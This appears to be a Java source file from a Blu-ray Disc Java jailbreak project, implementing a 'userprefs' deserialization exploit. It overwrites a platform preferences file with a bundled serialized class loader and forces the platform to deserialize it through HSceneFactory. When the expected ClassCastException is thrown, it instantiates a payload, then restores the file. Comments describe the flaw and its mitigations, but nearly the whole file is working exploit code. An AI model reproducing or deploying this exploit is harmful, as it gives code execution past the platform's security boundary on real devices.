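/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license. See the LICENSE file for details.
 */

package com.bdjb;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;

import org.havi.ui.HSceneFactory;

/**
 * Implementation of the userprefs deserialization exploit.
 *
 * <p>Vulnerability class (as visible from this file): a state file at {@code MNT_ADA_USERPREFS} is
 * written by this application and later consumed by the platform through Java object
 * deserialization (the legitimate content is itself produced with {@link ObjectOutputStream} in
 * {@link #restoreUserPrefs()}). Because the consumer does not restrict which classes may be
 * instantiated, replacing the file with a serialized {@code PayloadClassLoader} lets that class be
 * constructed on the platform side. The platform-side mitigations for this pattern are an
 * allow-list on the deserializing side (or a non-object data format for the preferences) and not
 * consuming a file from a location the application can write to.
 *
 * <p>The file is always restored in a {@code finally} block so a failed or partial run does not
 * leave the platform reading the substituted content.
 */
class ExploitUserPrefsImpl implements ExploitInterface {
  private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
  private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";

  /** Copy buffer size; 8 KiB is what the original implementation used. */
  private static final int COPY_BUFFER_SIZE = 8192;

  /**
   * Overwrites the userprefs file with the bundled serialized class loader, triggers the platform
   * read of that file, and then restores a default userprefs content.
   *
   * <p>The {@link ClassCastException} thrown by {@code getDefaultHScene()} is the expected signal
   * that the substituted object was deserialized (the cast that fails happens inside the platform
   * and is not visible here); only in that case is the payload instantiated.
   *
   * @throws Exception if the resource is missing, a file operation fails, or the payload throws;
   *     an exception raised while restoring the file in {@code finally} replaces an earlier one,
   *     as in the original implementation
   */
  public void trigger() throws Exception {
    try {
      overwriteUserPrefs();

      // Trigger the platform's read of the userprefs file.
      try {
        HSceneFactory.getInstance().getDefaultHScene();
      } catch (ClassCastException e) {
        // Exception expected: the deserialized object is not what the factory casts it to.
        // Instantiate the payload class.
        PayloadClassLoader.getInstance().newPayload();
      }
    } finally {
      // Restore userprefs file regardless of how the trigger went.
      restoreUserPrefs();
    }
  }

  /**
   * Copies the bundled {@code PayloadClassLoader.ser} resource over the userprefs file.
   *
   * <p>Both streams are closed in {@code finally} blocks, so a failure mid-copy no longer leaks a
   * file handle, and a missing resource is reported instead of surfacing as a
   * {@link NullPointerException} from {@code getResourceAsStream}.
   *
   * @throws IOException if the resource is absent or the copy fails
   */
  private void overwriteUserPrefs() throws IOException {
    InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
    if (inputStream == null) {
      throw new IOException("Missing resource: " + PAYLOAD_CLASS_LOADER_SER);
    }
    try {
      OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
      try {
        copy(inputStream, outputStream);
      } finally {
        outputStream.close();
      }
    } finally {
      inputStream.close();
    }
  }

  /**
   * Copies {@code in} to {@code out} until end of stream. Neither stream is closed here.
   *
   * @param in source stream
   * @param out destination stream
   * @throws IOException if reading or writing fails
   */
  private static void copy(InputStream in, OutputStream out) throws IOException {
    byte[] buf = new byte[COPY_BUFFER_SIZE];
    int read;
    // read() returns -1 at end of stream; 0 is only possible for a zero-length buffer.
    while ((read = in.read(buf)) != -1) {
      out.write(buf, 0, read);
    }
  }

  /**
   * Writes a default preferences array back to the userprefs file.
   *
   * <p>The layout ({@code String[9][]} with slot 3 set to {@code "26"}) is exactly what the
   * original implementation wrote back; what the platform reads from slot 3 is not visible from
   * this file — TODO confirm against the platform's userprefs layout.
   *
   * @throws IOException if the file cannot be written
   */
  private static void restoreUserPrefs() throws IOException {
    String[][] preferences = new String[9][];
    preferences[3] = new String[] {"26"};
    ObjectOutputStream outputStream =
        new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
    try {
      outputStream.writeObject(preferences);
    } finally {
      outputStream.close();
    }
  }
}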